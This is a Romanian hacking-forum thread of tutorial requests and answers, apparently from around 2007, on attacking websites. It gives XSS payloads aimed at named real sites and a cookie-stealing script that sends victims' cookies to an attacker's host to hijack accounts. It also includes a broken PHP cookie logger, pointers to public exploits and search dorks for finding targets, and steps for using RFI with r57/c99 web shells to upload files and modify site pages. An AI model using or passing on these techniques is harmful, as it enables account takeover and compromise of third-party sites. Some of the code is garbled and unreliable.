cereri tutoriale

[vladiii]

puteti sa imi cereti tutoriale despre orice si o sa incerc sa le fac.

regula: +30 posturi.

astept cereri ;d

[Ras]

poti sa faci un tutorial despre cum sa folosesti un exploit asupra unui site vulnerabil

mi se pare interesant si pt cei incepatori ca mine si pt altii

[vladiii]

Omule, pai nu prea stiu ce as putea spune despre exploituri, totul este atat de evident,,, De obicei gasesti diferite vulnerabilitati in siteul respectiv si exploitul o "exploateaza" si obtii privilegii pe site.

De obicei, exploiturile sunt scrise in perl (.pl) sau in C (.c) !!! Deci practic, daca esti incepator, scanezi siteul cu un web scanner (iti recomand Acunetix) apoi folosesti un exploit pentru vulnerabilitatea respectiva (www.milw0rm.org o gramada de exploituri). Sunt sute de softuri web vulnerabile, de aceea cand vezi, spre exemplu la site intr-un colt Powered by X, este bine sa cauti un exploit pentru X. Nu stiu ce sa iti spun mai multe... Cred ca sa spargi un site cu un exploit este cea mai simpla modalitate de cracking. Sper ca ti-am fost oarecum de folos.

Astept alte cereri, insa cu lucruri "ceva mai putin evidente" !!!!

[crystygye]

eu vroiam odata cam acelasi lucru....dar faza e ca nu prea inteleg acunexin ala...deobicei gaseste chesti de apache doar..

as dori un scurt tutorial despre "gasirea xss in siteuri" si cum te poti folosi de ele....daca se poate.mersi.

[vladiii]

Un scurt tutorial pentru tine.

De obicei, vulnerabilitatea XSS este legata de cookieuri si message boxuri. Sa presupunem ca am gasit un site vulnerabil la XSS. Fie acesta:

http://mystuff.uk.ask.com/user/DisplaySignup?prod=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Acest micut script adaugat la URL: <script>alert('XSS')</script> nu face nimic mai mult decat a insera un message box in pui tu un text care vrei. Spre exemplu modific <script>alert('xss')</script> cu <script>alert('vladiii')</script> . URL va arata in felul urmator:

http://mystuff.uk.ask.com/user/DisplaySignup?prod=%22%3E%3Cscript%3Ealert(%22vladiii%22)%3C/script%3E

Ok, decoamdata vulnerabilitatea nu face nimic, dar o putem exploata si mai mult. In loc de mesajul (XSS si vladiii) dintre cele 2 paranteze ale alertului (ale scriptului) putem introduce: document.cookie si javascriptul care trebuie bagat la URL va arata in felul urmator: <script>alert(document.cookie)</script>. Si in cazul XSSului nostru:

http://mystuff.uk.ask.com/user/DisplaySignup?prod=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Acest script genereaza un Message Box in care se afla cookieurile tale. Acum intrebarea se pune, cum fac rost si de cookieurile altor useri, ca apoi sa ma loghez pe conturile lor folosind acest cookie ? Sa consideram urmatorul cod:

<SCRIPT>location.href="http://www.siteultau.com/cookiestealer.php?c="+escape(document.cookie)</SCRIPT>

Acest cod il introducem la url si il trimitem apoi (url'ul) la victima. Daca aceasta da click pe link, atunci cookieurile sale vor ramane la tine pe FTP sau ti se vor trimite pe mail, depinde cum este conceput stealerul.

Exemplu de link:

www.sitevulnerabil.com/pagvuln.php?ceva=<SCRIPT>location.href="http://www.siteultau.com/cookiestealer.php?c="+escape(document.cookie)</SCRIPT>

Am spus mai sus ce face acest exemplu de link.

Acum ne intrebam: "Cum imi feresc siteul de vulnerabilitati XSS?". Simplu, de obicei eliminarea metacaracterelor din codul sursa (<, >) si inlocuite cu & gt si & lt, dupa caz, etc.

Cum te feresti tu impotriva atacurilor XSS??? Nu da click pe tot felul de linkuri ciudate si nu folosi Internet Explorer ca browser deoarece este plin de buguri (personal, iti recomand Mozilla Firefox)

Linkuri utile:

[url]http://www.blooberry.com/indexdot/html/topics/urlencoding.htm[/url]
[url]http://rstzone.net/forum/viewtopic.php?t=6250[/url]
[url]http://rstzone.net/forum/viewtopic.php?t=6233[/url]
[url]http://ha.ckers.org/xss.html[/url]

Sper ca ti-am fost de folos. Vlad

[cein]

Cred ca si lui dar in special mie.

TU ai explicat ft bine folosirea XSS-urilor dar nu ai explicat gasirea lor....

[escalation666]

Cred ca si lui dar in special mie.

TU ai explicat ft bine folosirea XSS-urilor dar nu ai explicat gasirea lor....

:roll:

Foloseste biolocatia Luke!

Pasul 1: iei o ramurica ;

Pasul 2: intri pe internet si incepi sa surfezi (navighezi);

Pasul 3: folosind biolocatia vei gasi apa...pardon...XSS.

[Ras]

Cred ca si lui dar in special mie.

TU ai explicat ft bine folosirea XSS-urilor dar nu ai explicat gasirea lor....

ca sa gasesti ... iti dau o metoda usoara:

-intra pe http://stiri.acasa.ro/

-dai la search si cauti <aaa>

-dupa ce dai search pt <aaa> link-ul arata asa http://stiri.acasa.ro/cautare.php?keywords=%3Caaa%3E&all=true&submit=Cauta

-in loc de %3Caaa%3E scrii <script>alert('XSS')</script>

-link-ul o sa ajunga asa: http://stiri.acasa.ro/cautare.php?keywords=<script>alert('XSS')</script>&all=true&submit=Cauta

cein mai bine downloadezi toate tutorialele video facute de slick despre XSS... [de acolo am invatat eu]

[cein]

ok, multumesc tuturor...

[G3o]

xss e usor e inteles dar greu pt a "sparge" un cont sau site deoarece totul tine de cookie(cookie stealer).

[dizzy]

nush, eu nu prea consider xss ca fiind hacking dar .. fiecare cu punctul lui de vedere, i hack systems not webpages

[zbeng]

inainte de a deschide un topic puteai sa te uiti sus ca mai este unul Important: cereti-mi tutoriale

nu iti spun cu suparare intentia ta e buna

[vladiii]

am deschis alt topic pentru ca am vazut ca nu prea ai mai intrat pe forum (nu ai net)... ti-am explicat pe mess...

cein, cum poti gasi xssurile ? In primul rand sunt sute de softuri web vulnerabile la XSS. Pentru a vedea cateva, uite aici:

[url]http://www.milw0rm.org/exploits/3490[/url]
[url]http://www.milw0rm.org/exploits/3447[/url]
[url]http://www.milw0rm.org/exploits/1547[/url]

Lista ar putea continua mult, insa nu vreau sa umplu forumul de linkuri de pe milw0rm.org, mai bine intra tu acolo, la functia Search si scrie XSS. Ai sa gasesti google dorks care apoi le poti incerca pe google pentru a gai siteuri vulnerabile.

Poate te gandesti, "Da, dar cum gasesc siteuri vulnerabile la XSS singur, fara google dorks?". Deobicei, majoritatea vulnerabilitatilor se gasesc "surfand" pe un motor de cautare, dar ca sa gasesti tu una singur, ar fi bine sa cauti mai intai in functia de Cautare (Search) a siteurilor, de obicei acolo se gaseste aceasta vulnerabilitate. Hai sa iti dau cateva exemple, din alea intelegi cel mai bine:

[url]http://www.hotbot.com/index.php?query=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&ps=&loc=searchbox&tab=web&currProv=msn&mode=?=&dfi=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&dfe=&region=&adf=[/url]
http://www.lamit.ro/cautare/index.php?query=%3Cscript%3Ealert('xss')%3C/script%3E&type=simple

De obicei, functia de Search "imparte" (daca pot sa zic asa) URL in mai multe parti, una dintre ele fiind partea in care arata ce am cautat noi. In exemplul de mai sus, query=... arata ce am cautat eu din browser, si apoi

modifici URL'ul, inlocuind ... cu <script>alert('xss')</script> . Si ai gasit propriul tau XSS. Cam asta este baza.

Pentru a pacali filtrerele web serverului sa permita adaugarea <script>alert('mesaj')</script> la URL, uneori trebuie sa encodezi URL'ul, pentru a face acest lucru si pentru a intelege ce face acel "calculator" cand encodeaza URL'ul tau, click pe urmatorul link:

[url]http://www.blooberry.com/indexdot/html/topics/urlencoding.htm[/url]

Sper ca am fost destul de explicit. Vlad

Astept alte cereri.

[crystygye]

mersi. acuma am inteles.stiam o partea dar nu stiam sa exploatez asa de bine.

scria cineva ca nu e asa folositoarea metoda la hack siteuri.

dar cand apare un xss ptr yahoo toti sarim pe el

-----

partea buna este ca Acunetix poate scana siteurile doar pentru xss, si devine treaba mult mai usoara

[buRn]

Ca tot este vorba de xss , vladiii am o cerere la tine .

Sa zicem ca am gasit un xss in yahoo/un site anume ..

Vreau sa obtin cookiurile de la admini.

Cum formez acest cookie

Imi poti explica ?

[fl0 fl0w]

Pentru a exploata un site vulnerabil trebuie sa injectezi scripturi pentru a culege user imput.Pentru cookiuri la fel trebuie sa folosesti un limbaj de scripting in primul rand ,logic si inainte sa testezi.

Testezi cu un alert ,apoi treci la lucru.

Faci o cerere GET catre locul unde sunt stocate : ['cookie'] ,copiezi intr-o variabila cea ce gasesti,apoi directionezi acel continut undeva.

Faci o schema URL ,apoi si o postezi in forumul ,guesstbook'ul ,site'ul respectiv.

Un astfel de script arata :

O sa folosesc php.

<?php
     $a=$_GET('cookie');
   $b=fopen("cookies.txt","c");
  fwrite($b.$cookie);
  f.close($; 
?>

Salvezi aa.php .

Schema url + cum o plantam :

<script>
        window.location="http://site_unde_ai_uploadat_scriptul.com/aa.php?cookie='+'document.cookie;
</script>

Scuze daca am scris nush cum ,m-a grabesc.

[MaHaReT]

sunt noob si recunosc nu prea le am cu asteaincep sa invatz , am lipsit o perioda lunga si am pierdut multe ... daca se poate cat mai multe info. despre XSS daca se poate ...

[vladiii]

nu inteleg Razvane ce nu intelegi din ceea ce am spus eu si flo_flow si din tutorialele video facute de slick... citeste-le cu atentie si ai sa intelegi cu siguranta!

astept cereri!

p.s. imi cer scuze daca o sa fac mai greu Mini-Tutorialele, dar am capacitatea anul acesta si trebuie sa ma ocup si de mate, romana si geogra

[crystygye]

vladii daca se poate mai cer si eu un scurt tutorial.

mersi inca o data pentru xss , eu am inteles cam tot.

vreau sa invat bine metoda cu lucratul shellului c99 pe hosturi.am inteles ca trebuie gasita o erroare de linie, si gandita...as vrea sa aflu mai multe despre.

adica ideea este sa invat sa gasesc erori si sa stiu cum sa ma folosesc de ele.asa in mare daca se poate.

[vladiii]

Ce tipuri de shell exista? Sunt doua tipuri de shell foarte importante care se folosesc in majoritatea crackurilor, acestea au 2 nume diferite: c99 si r57.

Sa le analizam un pic pe fiecare in parte:

1) r57 shell

Spre exemplu, daca gasim o vulnerabilitate intr-un site, cum ar fi Remote File Inclusion, folosim r57 shell, c99 nefiind de niciun folos in cazul de fata. r57 uploadeaza ceva pe server si listeaza apoi continutul directorului de pe server in care se afla fisierul uploadat de tine. Spre exemplu, poti uploada c99 shell, dupa care sa modifici apoi index.php sau mai stiu eu ce.

O mica imagine cu r57 shell :

Deci spre exemplu gasim un RFI intr-un site, sa zicem: http://sitevulnerabil.com/vulnpath=adresa de la shell

Ok, pana aici nimic nou, doar am gasit vulnerabilitatea si am pus la URL r57 shell. Ce facem mai departe? Ideea este sa uploadam ceva, nu? De preferat ar fi sa uploadam un c99 shell, dar asta depinde de fiecare. Cum uploadam ceva? Uite aici un exemplu:

Dam click pe butonul Browse din exemplu, selectam din calculator ce vrem sa uploadam si dam Upload si voila... Ceea ce am uploadat se va gasi pe server si poate fi accesat sin URL. Sa presupunem ca am uploadat c99.php. Sa continuam cu analiza lui

2) c99 shell

Urmatoarea poza ilustreaza un c99 shell:

In exemplul de mai sus nu se vede prea bine, dar in casuta in care se listeaza paginile .php si directoarele, in partea dreapta, sunt vreo casute (in dreptul fiecaruia) si mi se pare (nu mai stiu, m-am lasat de hacking:) ) ca pe al 2-lea buton daca dai o sa iti afiseze codul sursa, pe care il modifici dupa bunul plac si apoi dai Save. In exemplul din imagine ai drept si de citire, si de scriere, si de executare (drwx si rwx). Pe unele shelluri s-ar putea sa nu poti sa faci aceste lucruri.

Cam atat pentru azi vladiii 2007